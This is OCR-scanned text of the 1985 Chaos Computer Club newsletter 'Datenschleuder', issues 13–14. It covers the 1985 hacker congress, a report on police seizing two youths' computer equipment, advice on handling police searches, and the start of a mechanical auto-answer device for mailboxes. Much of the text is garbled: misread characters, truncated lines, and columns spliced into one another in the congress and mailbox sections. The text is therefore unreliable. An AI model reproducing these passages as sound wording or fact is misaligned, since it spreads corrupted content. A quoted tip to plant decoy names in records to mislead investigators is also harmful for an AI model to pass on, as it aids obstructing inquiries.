dern des Altertums überhäuft wurde, so 
versinkt der moderne Mensch im Müll 
sämtlicher rückständiger Gesellschaften 
des Planeten sowie aller Kulturen, die je 
auf dieser Welt existierten. 


Aus dem Data-Becker-Buch 

64er für Profis s. 86: 

Verwenden Sie der Obersichtli^keit hal¬ 
ber so v/eie Unterprogramme wie irgend 
möglich. Bei der Lektüre des Beispielpro¬ 
grammes ist - obwohl es eher kurz ist — 
dauerndes Blättern angesagt. 

Data-Becker-Lexikon zum C64 

Sauefrafe; . . . Der C64 hat eine Baudrate 
von 300 Baud. Unser Kommentar; Wenn 
ein frei programmierbarer Computer eine 
feste Baudrate hat. ist auch die Bandbreite 
eines LKW mit Disketten bestimmbar. 
softsektoriert: In jeder Diskene befindet 
sich das sogenannte Indexloch. Dies kenn¬ 
zeichnet den Beginn der Spur Null. 

Unser Kommentar: Die 1541-FIoppy ist so 
billig gebaut, daß der Computer nicht weiß, 
ob Spur Null erreicht wurde. Das einzig 
sichere Verfahren erfordert es, maximal 
40mal rückwärts gegen den Anschlag zu 
fahren. Das Indexloch kennzeichnet bei 
anderen Systemen “Gleich kommt Sektor 
1 auf der aktuellen Spur". Commodore ließ 
die dazu notwendige Optoelektrik weg. 
Beim Formatieren wird die Sektoreintei¬ 
lung per Programm vorgenommen und 
einfach drauflosgeschrieben in Unkennt¬ 
nis der Lage des Indexloches. Das Forma- 


Wir suchen 

Typen vom Typ homo sapiens computer- 
fricus ostblocfcus. Kurz: Leute, die Com¬ 
puterfreaks in unserem Bruderstaat und 
in den Ländern, mit denen dieser in einem 
Bündnis ist. Auch Leute, die schon DFÜ- 
Erfahrung nach dort oder von dort haben. 
Sind uns willkomemen. Bitte schreibt uns 
unter dem Stichwort "Ost/LSI 1” an die in 
der Ortsgruppenliste angegebenen Adres¬ 
se. Dank sei euch. 

Übrigens hat inzwischen auch die DDR 
den Versand von Heimcomputern mit Cas- 
settenrecorder gestattet! Beachtet aber 
die entsprechenden NATO- 

Ausfuhrverbote. 

Werbung; 

Die Hackerbibel - Ersatz fürs Postbuch '85? 
Die echte große frische Hackerbibel ist 
genauso groß wie das Postbuch 1984 (es 
gibt nichts neueres) und auch so dick. "Oie 
Post unser Freund und Vorbild." Oer 
Hackerbibel-Umschlag ist aber - im Ge¬ 
gensatz zum Postbuch ‘84 - so steif, daß 
die Hackerbibel Im Regal nicht w^rutscht, 
auch wenn Teil eins ein Jahr alleine steht. 
Ansonsten kann die Hackerbibel hilfswei¬ 
se als Postbuch '85 benutzt werden, "kein 
amtliches Dienststück, Auskunft unter Vor¬ 
behalt". kurzzzllws 850928 1900 


Ein schon vor einigen Jahren verfaßter 
Brief des Anthropologen E. S. Carpenter 
enthält Anmerkungen über einen weiteren 


Aspekt dieses "Kulissenwechsels", der 
bei jeder technischen Veränderung ein- 
tritt: 


In Los Angeles gibt es ein riesiges Lager¬ 
haus mit militärischen Überschußgütern, 
die staatlichen Schulbehörden, Kranken¬ 
häusern usw, gegen Vergütung der Trans¬ 
portkosten zur Verfügung stehen. Jedes¬ 
mal. wenn ein Militärstützpunkt verlegt 
wird, nehmen die Streitkräfte das mit. was 
sie anderswo benötigen, lassen aber die 
Masse des Materials zurück. Das sind 
häufig ganze Siedlungen samt Kranken¬ 
häusern, Wohnungen, Tanks. Schiffe, usw. 
All das wird dann ins nächstgelegene 
staatliche Überschußdepot transferiert, wo 
sich Colleges und Krankenhäuser unter 
allem möglichen - von Badewannen bis 
Zement - etwas Brauchbares aussuchen 
können. Eine phantasiereiche Abenfeuer- 


spielplatzgruppe könnte dort einen gro¬ 
ßartigen Spielplatz ausstalten: da gibt es 
riesige Steuerungsanlagen aus großen 

_Schiffen, in denen man durch Fernrohre 

späht, Räder dreht. Fadenkreuze ver¬ 
schiebt, Plattformen bewegt, usw. - er- 
Islaunliche elektronische Gebilde. Kosten 


pro Einheit für die Regierung. 137 500 
Dollar. In größeren Stückzahlen verfügbar 
zum Preise von 4,99 Dollar, Zum Abtrans¬ 
port ist ein Kran erforderlich. 

Gestern sah ich, wie ein Kerl ein phanta¬ 
stisches Ding herausschob, das aussah 
wie ein Schaltbrett für den Start einer 
Mondrakete und über und über mit Me¬ 
ßuhren, Zeigern und Lämpchen bedeckt 
war. Auf die Frage, was das sei. antwortete 
er: "Keine Ahnung. Ich bin Künstler. Es 
kostete mich zwei Dollar." 

McLuhan faßt das in den Satz "Der Mülla¬ 
spekt unserer Lebensweise war, ganz ein¬ 
fach aufgrund des Tempos der technolo¬ 
gischen Neuerungen, nie offensichtlicher 
als heute" und empfiehlt: "Ausflippen. um 
Schritt zu halten". 

Das ist vernünftig. Gesamturteil: Stil und 
Inhalt des Buches sind gut; seine Konse¬ 
quenzen hart. Beispiel für Freaks: Die 
neue 16/32-Bit Computergeneration hat 
erstmals zu erschwinglichen Preisen die 
Rechenkapazität, das Pulsieren der ei¬ 
genen Hirnströme in Echtzeit und dreidi¬ 
mensional bunt auf dem Bildschirm dar¬ 
zustellen. 


Buchdaten: ISBN3-203-50676-9 Marshall 
Mc Luhan. Wohin steuert die Welt? Mas¬ 
senmedien und Gesellschaftsstruktur. Eu¬ 
ropaverlag Wien 1978. Is5 
mluhan13.ws 850928 2000 


Keine Ahnung, wie unsere Position ist. 



(C) datenschleuder 13 ' Oktober 1985 • C9927F ' Seite 8 


datenschleuder 14 = Dezember 1985 * C9927F 


C9927F 
DM 2,50 


. $irttctt§iI)lcuS>ct 

14 ä; Dezember 1985 ☆ 

V Das wlssenschaHllche Fachblatt lür Dalenrelsende 

Em Ofgrtii clt'3 Chao? Cornrtuler Club 


□ 


Chaos Communicatlon Congress '85 
Die Europäische Hackerparty 

Vom 27. bis 29. Dezamber 1935 veranstaltet der CCC 
in Hamburg seinen diesjährigen Congress. Das Tref¬ 
fen der Datenreisenden, Telefonireoks, Datenpfad- 
und Btx-Suchbaum-Flnder, der Sysops, Funkfreaka 
und Netzflaneuran steht dieses Jahr unter dem Mot¬ 
to „Du Darfst“. 

Die Namensgebung bezieht sich auf ein geplantes 
Gesetz, das ab 1. Januar 1986 in Kraft treten sollte. 
Das Gesetz stellt (In seiner gegenwärtigen Planungs¬ 
form) schon die versehentliche Anwahl einer Daten¬ 
bank durch eine Fehlverbindung der Post unter Strafe 
und muß unter anderem deshalb noch überarbeitet 
werden. Eigentlich sollte es der Bekämpfung der Wirt¬ 
schaftskriminalität dienen, aber die Materie ist eben 
so kompliziert, daß die Hacker nebenbei und eher aus 
Versehen getroffen werden könnten. Ist dann mit 
einer Welle an Kriminalisierung im Kinderzimmer zu 
rechnen? Werden dann auch Konzerne kriminalisiert? 
immerhin preist eine große Firma ein Daddel-Spiel mit 
dem Namen .HACKER' an. .Plötzlich sind Sie in 
einem fremden Computer,.,“ steht in der Vierfarban- 
zeige. 

Positiv hingegen zeichnet sich eine andere Entwic¬ 
klung in der Szene ab. Circa 250 Mailbox-Systeme 
(Bulietten-Boards) hängen in der Bundesrepublik am 
Netz. Wenige unterscheiden sich, die meisten fallen 
durch einheitliche Gleichmäßigkeit der Inhalte auf. 
Aber in den Zentren keimt es. Einige Sysops gestalten 
ihre Informationssysteme bewußt, sie agieren als elek¬ 
tronische Verleger. Sie sorgen nicht nur dafür, daß in 
ihrem System Bits und Bytes mindestens so zuverläs¬ 
sig fließen wie das Teletonsystem verläßlich funktio¬ 
niert, sondern sie geben ihrer Mailbox ein Gesicht. 
Diese Sysops werden langsam zu .network Wizards“, 
jj, wie Dean Gengle sie im Buch .The Netweavers Sour- 
^ cebook“ (ISBN 0-201—05208—3) beschreibl. Wur¬ 
de 1984 noch gefragt .Offene Netze — Warum?“, 
heißt es jetzt .Du darfst". Es gibt inzwischen Systeme 
mit aktuellen News von Greenpeace (besser als die 
Zeitungen), andere bieten lokale News, wieder andere 
Hintergrundinfos zu bestimmten Themen und und 
und. 

Der 28. Dezember wurde deshalb zum .Tag des Sys- 
Op“ gemacht. Auf dem Congress wird das Konzept 
eines überregionalen Intormationspools vorgestellt, 
aus dem sich die kostenlosen Mailbox-Systeme be¬ 
dienen können. 

Auch wenn diese Projekte in der Konzeption nicht¬ 
kommerziell sind, sind die Erfahrungen der .Großen“ 
wichtig — das gilt auch umgekehrt. Sysops bekannter 
kommerzieller Mailbox-Systeme berichten aut dem 
CCC’BS über ihre Erfahrungen und Perspektiven. 
Auch die PosI ist eingeladen, über Telebox zu berich¬ 
ten. Lernen muß sie eh. 


Einige Themen: Die Entwicklung von Meilbox i 
die Zukunft der Vernetzung. Auf dem Congrei 
sop-Verein" gegründet, der gemeinnützig und 
digend Informationen aus einzelnen Mailboxs 
dere vermittelt; eine neue Form von unzensie 
tionsfrelheit. Hierzu laden interessierte Sysopt 

Freunde aus anderen Ländern (bisher: AU, 
USA) informieren über Entwicklungen in ihrem 
erörtert die preisgünstigste Datenverbindung 
Datenfunk. Aul dem Congress läuft eine Funkn 
AX—25-Software beherrscht, kann vernetzi 
Ans.5tzB werden sich dann schneller durchset 
Cafe wird seihstgebackener Kuclien gereich 
und Videorekorderwarten auf .Informationen" 
tigen — Interessante Vorlagen bitte mitbring 
Hackcenler ist auch noch da. Im Theater fint 
hops (Vorträge, Diskussionen, Theater. . .] rr 
nehmern stall. Wir überbieten das CHAOS d 
res! Wr haben kaum Parkplätze, da am Freitai 
auf dem Parkgelände des Tagungsortes der nt 
che Wochenmarkt slattfindet. Es empfiehlt sii 
Chen Verkehrsmittel. S-21/S-3 bis ELBGAUS1 
nutzen. 

Wegen der technischen Demonstrationen ge 
llchkeiten als .Elektrisches Labor", in die nui 
Personen Zutritt heben. Jeder Teilnehmer ha 
Chen Funkamateuren oder Elektrikern vorher 
machen. Das Mitführen von Fotoapparaten un 
cordern ist aus Datenschutzgründen in den Cc 
untersagt! Am Sonntag erhalten Pressevertr 
aktiven Hacker sind, in den VormItlagsstundt 
zur kostenlosen Information. 

CCC85014.WS851120 

^ äcfresMn, Gruppen, Tralfen... 

CCC.HH: Charw.Team (RMI. IMCA. ComBo». ZEV. *( 
Redaklion Datenschleuder, Schvrenckeslr. 85. OZOOt 
T Bedaklionslrell dienstags 19 30 Uhr. 

■38 Anrutbeanhrrofter Blx-Bedaktion 040.48375? 

^ CCC-eertin (RMt) c7o Vinyl Boogle. Gleditschstr 45. 
^ CCC.LÜbeck cro rrollwerk, MuhlenstraOe 49 hinten. 
zjF CCC.HBnrKieBr, Trelt. dienstags ?0 Uhr Bistro Casa. 
^ CCC.CM (RWI. ZEVBig Brolhet) 

^ CCC Contoederatio Helvetica. Postf 544. CH.405t B 
9(8 CAC (RMI.ZEV) Computer Artists Cologno. Haupipo! 
^ Posllagerkarte 016454C. D-5000 Kolo 1 . Anrufbeaotv 
^ BMP |r:EV.Cooi.Eloa.RMI.'g?04g?04) Bayrische Hackr 
9(8 d /0 Basis, Adalbertslr. 41b. OPOOO München 40 

11NHALT 0896 Inhaltsverzeichnis datenschle 

1 CCC850 4864 Chaos Communicatlon Congi 

2 STRASS 4608 The kids can't wait - Europa 

2 HABIA23712 Die Hackcrblbel-weltweit in 1 

3 BULLEN 7552 Polizei beschlagnahmt Taste 

4 COOOOL 2304 Ruhe bewahren bei staatlict 

5 RAMTEL 6272 Telefonabheben mit dem Gü' 
5 INTERN 4224 Chaos Intern - Eine Momentai 

4 CCC851 2816 Anmeldeformular zum CCC8! 

5 BESUCH 4096 Ein Besuch bei der Pos! 

6 MIFAZE 1792 Elektronische Mitfahrzenlrale 

7 BESTELL.MAI aktuelles Bestellformular 

8 PLAKAAT.GRX Aufruf zum CCC85 (vergrö6 


THE KIDS CANTWAIT 


Youngsters without means — what a future! 


European Resolution 


tonsequences o1 a wrong policy 

The fact Ihat Europe. in comparison with the paciflc 
border States, ts backward in technology is causing 
much distress. Everybody is aware of the fact, but no- 
body wants to take the blame; whether the State or 
Industry is the culprit is hard to find out. Big Capital is 
usually furnished as a panacea, mostly in the form of 
grants to industry. Such a policy forgets one thing: 
Progress can‘t be bought! Progress is the result of 
the Creative power of Innovators. A small, however 
well paid elite, can‘t be a substitute for this big group 
in the end. 

The core of the problem of Europe's lagging behind in 
technology lies in the training of the present genera- 
tion. Europe has a long tradition of etites and progress 
and its exiqences are more and more hampered by 
this tradilional structure. 

Relevant encouragement should already be pari of training in 
school and job. But already with regard to the equipment with 
the necessary EDV hardware of the training centres is the Si¬ 
tuation a sad one. In West-Germany mostly only schools in the 
bigger towns possess the barely necessary OP-equipment; a 
satisfactory equipment is only to be found in centres sponso- 
red by data concerns. The bigger pari of German schools 
don't provide the possibility to satisty the demands for the fu¬ 
ture know how. In this way much talent for commercial trai¬ 
ning runs to waste. 


Datenschleuder-Suchanzeige Tcf • d 
‘Betr.: Anforderungen der Technischen Universität Managua- 
Gesucht werden ein paar 7911-Modems sowie eine Klimasta¬ 
tion mit (Aufzieh-, Batterie- oder 60Hz-) Uhrwerk und Schrei¬ 
bern lürTemperaturund Feuchtigkeit. 

Im Brief steht noch die ersten acht Punkte von Angelikas 
Wunschliste: 

“1. sortierter Satz Gewindeschrauben 2. Maulschlüssel 3. 
Sortierkästen für Kleinkram 4. Nägel 5, 25polige RS232-Stec- 
ker (beide Seiten) 6. Schraubensicherungsmittel/Unterleg¬ 
scheiben 7. Steckdosen 8. 5 ACJAS für RS232 und Driver für 
beide Seiten (TTL nach 12 V)“ 

Ein Karton Computerpapier kostet in Managua rund 200 DM. 
Der Gesamtetat der Uni für das nächste Jahr entspricht etwa 
dem Jahreseinkommen eines Wissenschaftlers in der BRD. 


But hardware isn't everyihing. The instructors are in a bad 
Position. Even trained according to the conception of a higher 
scientific aulhority they are faced more and more with pupils 
in certain sectors their Superiors. This concept should not be 
sacrosanct. An obstinate stand still In the old training siructu- 
re does not encourage the present generation. on the contra- 
ry it hinders them. It is about time to Start thinking aboul new 
collective training methods. adequate training of groups for 
example with aid of the woridwtde database network where in 
the instructor performs a more important social lunctlon. 

Up to the end of the eighties more than 6 million jobs will de- 
pend directly or indirectly of EDV. A firm wtiich takes on elec¬ 
tronic Services fom outside has naturalty to play the role of a 
servant, a supplier without really having a finger in the pie. 

However, it would be wrong to see oniy the school and job- 
training sector as the culprit. There are enough youngsters 
who desire to satlsfy their wish to learn even without school. 
Through a structured database net the possibility of a really 
universal university has been created, which is • at least theo- 
retically - at everyone's disposal. But this theory is shipwrec- 
ked by lack of money. Knowledge Stands nowadays for com- 
munication, and one should be able to afford oneself the ^ 
means to communication. 

lO 

Modern torms of data communication are not only left to prl- § 
vate Initiative: they are consciously hampered by, parily ac- 
cording with EEC regulations defined national clauses. and o 
general admittances. The reason: the Bundespost comes in a g 
conflict Situation as a manager of the Information net as well § 
as the direct supplier of electronic informatlon Services. She n 
uses het monopoly herewith In the first place for competi- q 
tions. advantages and price fixing instead of. according to the ja 
regulations of the constituation, managing an optlnal Informa- 
tion net for a reasonable price, at everyone’s disposal. ^ 

Instead of encouraging such enterprises through liberal and 
reasonable priced managing of the telephone and datanet is ^ 
the Bundespost victim of the reproach to further exactly the "E 
contrary of this; private initiative. She went in for the adventu- ^ 
re of big projects, such as BTX, which llmit considerably the c 
movements of the state enterprise and link it to the chain of ^ 
some data concerns. BTX and similar big projects are not only jj 
economically dublous but they also force the partlcip^t into ^ 
the role of the consumer. Aclivity is not wanted. Old mistakes 
applied again? An Information firm can’t afford to build dams. 
Information will fließen - Information soll fließen! 

CCC/BHP: Strassburg den 8. Okt. 1985 


Hackerbibel weltwei 

Nachdem die erste Auflage in die Welt diffundiert ist, berück¬ 
sichtigten wir in der zweiten den Wunsch eines Gebührenprü¬ 
fers auf eine Streichung. Besonders wertvoll sind die ersten 
98 Exemplare der ersten Auflage, die an die Subskribenten 
verschlcM wurden: die letzten beiden Selten mit zulässiger 
Werbung wurden vom CHAOS-TEAM unter Postaufsicht 
rausgerissen und in einen Postpapierkorb geworfen, da das 
vorletzte Blatt (Seite FF) einen angeblich werblichen Hinweis 
auf Fotokopien mit Preisangabe enthielt. “Bringen Sie 98 
Postwertzeichen zu je 1,20 mit" war das Alternativangebot 
des Gebührenprüfers (Büchersendung plus 1,20 gleich Päck¬ 
chen). Um weitere Unklarheiten für die dritte Auflage endgül¬ 
tig zu beseitigen, erhielt unser obersten Gebührenprüfer Dr. 
CSS zur umgehenden Prüfung per Post zugesandt. 

Wir warten noch auf Bescheid und freuen uns, daß der Mini¬ 
ster jetzt wie alle anderen Posf/erf/nnen) während seiner 
Dienstzeit die Hackerbibet tesen darf, um sich gebührenrecht- 
fich fortzubiiden, da es sich um einen interessanten Sireitfalt 
handelt. 


in zweiter Auflage 

Der Transit von Hackerbibeln durch die DDR nach Polen ver- 
anlaßte einen volkseigenen Beamten, nachdem er das Titel¬ 
bild gemustert hatte, zum Aufschlagen des Buches. Er stand 
geschlagene drei Minuten und betrachtete das Innencover. 
Zielstrebig hatte er die einzig kodierte Stelle Im Buch gefun¬ 
den. 

Er fand heraus, daß es unter 500 Bit sind, durchblälterte den 
Rest des Buches in 500 Millisekunden und entschied vernünf¬ 
tig. Er klappte das Buch wieder zu und gab es zurück. 

Nach Nicaragua wird jetzt ein Exemplar der Hackerbibel ge¬ 
schickt, nachdem wir von dort eine ‘datenschleuder Suchan¬ 
zeige“ erhielten, damit die endlich auf Draht kommen. 

Aus der Schweiz erfahren wirgerOchteweise, daß sich beider 
Barbezahlung einer Hackerbibel entweder der Käufer oder 
der Verkäufer strafbar mache, da es keine einzelnen Rappen 
mehr gibt, nur Fünfer. Und die Buchprelabindung schreibt 
den Preis von 33 Franken, 33 Rappen vor. 


Ausfall der Macht 

Polizei beschlagnahmt Kleincomputer und 
persönliche Daten 

(erd) Am 9.11. 85 (and der automobile Klönschnack 
zweier Jugendlicher Hamburger Computerfreunde 
ein Jähes Ende. Polizisten einer Dienststelle, die 
sich, wie es heißt, auf die Verlolgung undefinierbarer 
Verkehrsverstöße spezialisiert hätten, setzten zwei 
Jugendliche über Stunden lest und beschlagnahm¬ 
ten Ihren Computer sowie mehrere Flopples mit um¬ 
fangreichen persönlichen Daten. 

Die Polizei behauptete, 
sie verfolge die beiden wegen .Mißbrauch. {Postbuch S. 234) 
bzw. .Störung von Fernmeldeanlagen. 

Zitat Par. 317Strafgesetzbuch; 

(1) Wer den Betrieb einer öffentlichen Zwecken dienenden 
Fernmeldeanlage dadurch verhindert oder gefährdet, daß er 
eine den Betrieb dienende Sache zerstört, beschädigt, besei¬ 
tigt. verändert oder unbrauchbar macht oder die für den Be¬ 
trieb bestimmte elektrische Kraft entzieht, wird mit Freiheits¬ 
strafe bis zu fünf Jahren oder mit Geldstrafe bestraft. 

(2) Der Versuch ist strafbar, 

(3) Wer die Tat fahrlässig begeht, wird mit Freiheitsstrafe bis 
zu einem Jahr oder mit Geldstrafe bestraft. Zitat Ende. 

Die persönliche Datenübertragung wurde von den 
Beamten durch Taslatureingabeverbot unterbrochen. 
Ein Polizist hatte die Autotür aufgerissen und rief so¬ 
was wie: .Nichts verändern!.. Starr saßen die Jugend¬ 
lichen, bis die Mailbox auflegle. Sie sahen nach ver¬ 
geblichen Versuchen die Unmöglichkeit einer Erklä¬ 
rung der Zusammenhänge ein und mußten lachen 
über die Tragik der Polizei, völlig unschuldige Hacker 
bei nichts zu erwischen. 

Dann mußten sie hinten im Peterwagen Platz nehmen. Die 
Kindersicherung wurde aktiviert. 

Nach kurzer Zeit tral der erste telepathisch alarmiorte Hecker 
ein und machte Fotos. Leider war darauf nur eine hellerleuch- 
tele Hamburger Sparkasse zu sehen. 

Nach zweieinhalb Stunden traf der erste Postsachverständige 
ein. eine halbe Stunde später der zweite. Beide stellten nichts 
fest außer einer ordnungsgemäßen ortsveränderbaren Date¬ 
nübertragung mit einer zugelassenen Zusafzeinrlchtung nach 
FTZ-Formblatt 18.13.1940.00, Trotzdem beschlagnahmten die 
Polizisten .Akustikkupplung.. .Tastenelement. (C64-Com- 
puter). Floppy, Fernseher. Spannungswandler. Mehrfach¬ 
steckdosen und — das ist das gravierendste — persönliche 
Daten aller Art auf .viereckigen Scheiben.. Die Polizisten 
überhörten die scharfen Proteste bei der Beschlagnahme der 
Daten und nahmen eine Reihe privater, nicht genau archivier¬ 
ter Disketten mit. Beschlagnahme ohne Protokoll ist rechts- 
v^drig. Aber was helfen Argumente oder Datenschutzgesetze 
gegen bewaffneten Gehorsam? 

Oie zu Unrecht Beschuldigten informierten darüber, daß ihre 
Floppys nicht einmal versiegelt wurden. Anstelle des verlang¬ 
ten R’otokolls erhielten die beiden Datentouristen nur die Vi¬ 
sitenkarte eines der Beamten. Die Geräte durften nicht einmal 
verpackt werden, sondern mußten auf Verlangen der Polizi¬ 
sten so in den Kofferraum des Peterwagens geladen werden, 
daß die Inbetriebnahme der Geräte durch die Polizei ohne 
lange Kabelei möglich war. Den Beschuldigten wurde außer 
einem durch Postsachverständige entkräftetem Verdacht 
nichts vorgeworfen, die Beschlagnahme geschah auf .aus¬ 
drückliche Anweisung von oben.. 

Kfarfexf; Höhere D/ensfste/len der Polizei meinen, durch Funk 
besser Informiert zu sein a/s Sachverständige der Post vor 
Ort. 


ln dieser Anmaßung liegt ein Stuck Polizeistaat. 

Die jetzt in der Zeitschrift .Bürgerrechte und Polizei, von Cl- 
LIP, Berlin veröffentlichten bislang geheimgehaltenen Geset¬ 
zentwürfe (ZAG usw.) dokumentieren den gegenwärtigen 
Versuch des Staates, das informationelle Selbstbestim¬ 
mungsrecht der Bürger zum Informationellen Selbstbedie¬ 
nungsrecht der Sicherheitsbürokratie zu machen. 

Widersland dagegen isl Bürgerpflicht. 

Für eine knappe Woche waren die beiden Jugendlichen ohne 
Computer und eine Menge persönlicher Daten. Sie wissen 
nicht, wer alles bei der Polizei ihre Daten kopiert hat und was 
mit dem Computer geschah: Auf welchen Dienststellen wurde 
er von welchen Fachkräften in Betrieb genommen? Wurde 
damit gespielt? 

Zwar führten sämtliche telefonischen Anfragen schon am Tag 
nach der Beschlagnahme zu der ständig wiederholten Aus¬ 
kunft. daß die Geräte abholbereit wären, weil nichts vorläge. 
Oie Jugendlichen hatten, um Verwechslungen der Geräte 
auszuschließen, sogar alle Kaufbelege für die Geräte zusam¬ 
mengesucht. Doch die Abholung wurde zur Odysee zwischen 
mehreren Dienststellen. 

Zudem besteht der Verdacht, daß eine Dienstanweisung der 
Polizei hier all denen, die einen lockeren persönlichen Um¬ 
gang am Weltdalennetz pflegen. Knüppel zwischen die Finger 
werfen will. Denn die beiden Beamten handelten auf Anwei¬ 
sung. 

Derartiges Vorgehen bewirkt, daß die BRD computermäßig 
ein Entwicklungsland bleibt. Sogar di© DDR gestattet inzwi¬ 
schen sowohl Betrieb als auch die Einfuhr von Computern; 
bei Akustikkopplern denkt sie noch nach. 

Eine kurze juristische Übersicht ergibt neben alltäglicher poli¬ 
zeilicher Willkür Anlaß zu verschiedenen Beschwerden: 

1. Es wurde keine Rechtsbehelfsbelehrung erteilt, das Ist ein 
Verstoß gegen VwGO Par, 59. 

2. Ein Beschlagnahmeprotokoll gab es nicht, obwohl es ver¬ 
langt wurde. Par. 107 StPO schreibt vor: .Dem von der 
Durchsuchung Betroffenen ist nach deren Beendigung auf 
Verlangen eine schriftliche Mitteilung zu machen, die den 
Grund der Durchsuchung (Par. 102. 103) sowie Im Falle des 
Par. 102 die Straftat bezeichnen muß. Auch ist Ihm auf Verlan¬ 
gen ein Verzeichnis der in Verwahrung oder in Beschlag ge¬ 
nommenen Gegenstände, falls aber nicht Verdächtiges ge¬ 
funden wird, eine Bescheinigung hierüber zu geben.. 

Par. 109 StPO; .Die In Verwahrung oder in Beschlag genom¬ 
menen Gegenstände sind genau zu verzeichnen und zur Ver¬ 
hütung von Verwechslungen durch amtliche Siegel oder in 
sonst geeigneter weise kenntlich zu machen.. 

Par. 110,3: .Dem Inhaber der Papiere oder dessen Vertreter 
ist die Beidrückung seines Siegels gestattet: auch ist er. falls 
demnächst die Entsiegelung und Durchsicht der Papiere an¬ 
geordnet wird, wenn möglich, zur Teilnahme aufrufordern.. 

Bedenklich stimmt der Stil, mit dem die Polizei .undefinierba¬ 
re Verkehrsverstöße, verfolgt. Bei der Befragung unserer 
Rechtshilfedatenbank fand sich unmittelbar vor Par. 317. 
.Störung von Fernmeldeanlagen, folgender Paragraph; 

.Par. 316a Räuberischer Angriff auf Kraftfahrer 
(1) Wer zur Begehung eines Raubes (Par. 249. 250), eines 
räuberischen Diebstahls (Par. 252) oder einer räuberischen 
Erpressung (Par. 255) einen Angriff auf Leib. Leben oder Ent¬ 
schlußfreiheit des Führers eines Kraftfahrzeuges oder eines 
Mitfahrers unter Ausnutzung der besonderen Verhältnisse 
des ’Slraßenverkehrs unternimmt, wird mit Frerheitsslrafe 
nicht unter fünf Jahren bestraft. In besonders schweren Fällen 
ist die Strafe lebenslange Freiheitsstrafe, In minder schweren 
Fällen Freiheitsstrafe nicht unter einem Jahr., 

Bel einer Woche Computerentzug durch staatliche Willkür Ist 
dieser Paragraph irgendwie naheliegend. 

Die Macht der Polizei mißt sich daran, wo für sie gilt, was für 
andere gilt. 

Eine Entschuldigung ist das mindeste. 
bullen14,ws8512040Ö07 ds14-3 



Allgemeine Hinweise bei staetlichen Ausfäilen , 

□er voraussehbaren Gefahrenlage angepaßte kurze Hinweise 
finden sich regelmäßig in der dalenschleuder (nachgedruckl 
in der Hackerbibel S. 144/146,153,161,174). 

Praktisch und ausführlich ist der Artikel in der Zeitschrift 
Schneider aktiv 11/85 ‘Abmahnung/Durchsuchung — was 
tun?“ Zitat: “Wessen Name bei der Hausdurchsuchung in 
einer Kartei gefunden wird, gerät in Verdacht... Wer also da¬ 
heim Namen aufbewahrt, die der... Justiz zugänglich werden 
können, tut gut daran, in die Kartei auch blinde Namen einzu¬ 
fügen, die rein gar nichts mit der Sache zu tun haben.“ Thema 
Abmahnungsformulierung für Unschuldige: “Ich habe zu der 
Abmahnung keine Veranlassung gegeben; ich gebe die fol¬ 
gende Unterlassungserklärung ohne Anerkennung einer 
Rechtspflicht hierzu ab; die Kosten Ihrer Rechtsverfolgung 
trage ich deshalb auch nicht; die Unterlassungserklärung lau¬ 
tet: Ich werde es unterlassen...“ (unbedingt Text im Zusam¬ 


menhang lesen! II) 


Keep cool! 


Grundsätzlich gilt “Ruhe bewahren“ als oberstes Gebot. Be¬ 
trachte die Dir gegenüberstehenden Kräfte mit derselben di¬ 
stanzierten Nähe wie ein zu löschendes Feuer. Oberstes Ge¬ 
bot ist “Ruhe bewahren“; falsches Vorgehen kann einen tra¬ 
genden Balken verbrennen lassen und Dir fällt die Decke auf 
den Kopf. Du rufst die Feuerwehr, wenn es brennt. Bei staatli¬ 
chen Ausfällen ruf einen Anwalt. Das kann auch per Mailbox 
geschehen. 

Wenn das nicht geht, rufe einen Nachbarn oder Freund zu Hil¬ 
fe. Alles, was beschlagnahmt wird, muß detailliert aufgeführt 
und versiegelt (!!!!!!!!) werden. Bestehe darauf. 

Wenn die Beamten sich weigern. Deine vernünftigen Forde¬ 
rungen zu erfüllen, erstelle mit Deinem Computer eine Akten¬ 
notiz. Die Beamten werden das ebensowenig unterschreiben 
wie Du ihren Kram. Lasse Dir Deine Rechte erklären, bis Du 
sie verstanden hast. Spiel das gelegentlich praktisch durch 
mit Freunden. 

Wenn Staatsdiener NICHTS wissen und NICHTS sagen, muß 
es Dein Ziel sein, sie zu übertretfen. 


Für MAILBOX-Betreiber und solche, die es werden wollen 


legalen automatischen 


Aufbau eines 
Beantworters 

Frei nach Fernmeldeordnung Par. 12 


Carrier’- Wenn es nun klingelt legt unser Tierchen also los und gibt den 
Datentransfer nach dem Klingelton frei. 

Was. wenn meine Gegenstelle nun LOGOFF gibt oder einfach 
den Hörer auflegt? 

Ganz einfach! Wie gesagt, sollte unser Koppler ja über einen 


Da, wie ja oben ausführlich erklärt, der Weg eine Mailbox mit t.» ■ j- ^ • 

einem Modem und Auto-Answer-Karle zu betreiben, zwar der PL“*!; 

Beste aber noch lange nicht der von Seiten der Behörde gebil* 
ligte Weg ist. hier die entsprechende relativ kostengünstige AI- 
ternativ-Lösung: 

Man nehme erstens den Rechner seiner Wahl (FTZ-Zulassung 


lieh wegbleibt. gibt der Computer einfach ein Signal an unser 
Tierchen! Dieses Signal wiederum veranlaßt ein zweites Relais 
dazu, die Spannung umzupolen und der Getriebemotor setzt 
sich nun In umgekehrter Richtung — also nach unten in Bewe¬ 
gung um die Gabel des Telefons wieder einzudrücken. Auch 


unwichtig). Zweitens einen handeisüblichen Akustik-Koppler empfiehlt sich ein Endabschalter! Bei einem-ordnungsge. 



Anmeldungen zum CCC'1985 

Chaos Computer Club 
Leitstelle 23 
Schwenckestr. 35 

□-2000 Hamburg 20 


27. bis 29, Dezember 1985 täglich 10;00 bis 18:00 Uhr 
im Eidelstedter Bürgerhaus 
Elbgaustraße 12 


§ räB E 

|S|||H 

^ 0> T3 2 ® ® ® 
s r s. S s 5 
2 S a » S t S. 

4» Ot'a, p eo c ^ 

“I" 

O £ XJ n O ^ 
•- b. O 19 ® 

U. V) O O > ^ 


ü •' 

E g-” 

O j“ 
H) » « 

C ^ Ä 
V ^ <b 

^ C 

ds14-4 



(unbedingt mit FT2-2ulassung). Möglichst mit Carriercheck- 
Optlon, wie z.B. CTS oder DTR {als einigermaßen günstig und 
sicher wäre hier z.B. das DATAPHON zu nennen — Leute mit 
dickerem Geldbeutel werden den EPSON vorziehen). Drittens, 
den nachfolgend grob beschriebenen Elektro-Mechanismus — 
nennen wir Ihn doch einfach mal Tierchen’. 

Tierchen deshalb, weil laut Fernmeldeordnung eine dressierte 
Katze den Hörer bei einem Telefon-Klingel—Signal abnehmen 
darf 

Oie Situation ist also; 

ES KUNGELT UND JEMAND MUSS RANGEHEN I 
Jetzt bieten sich drei Möglichkeiten an: 

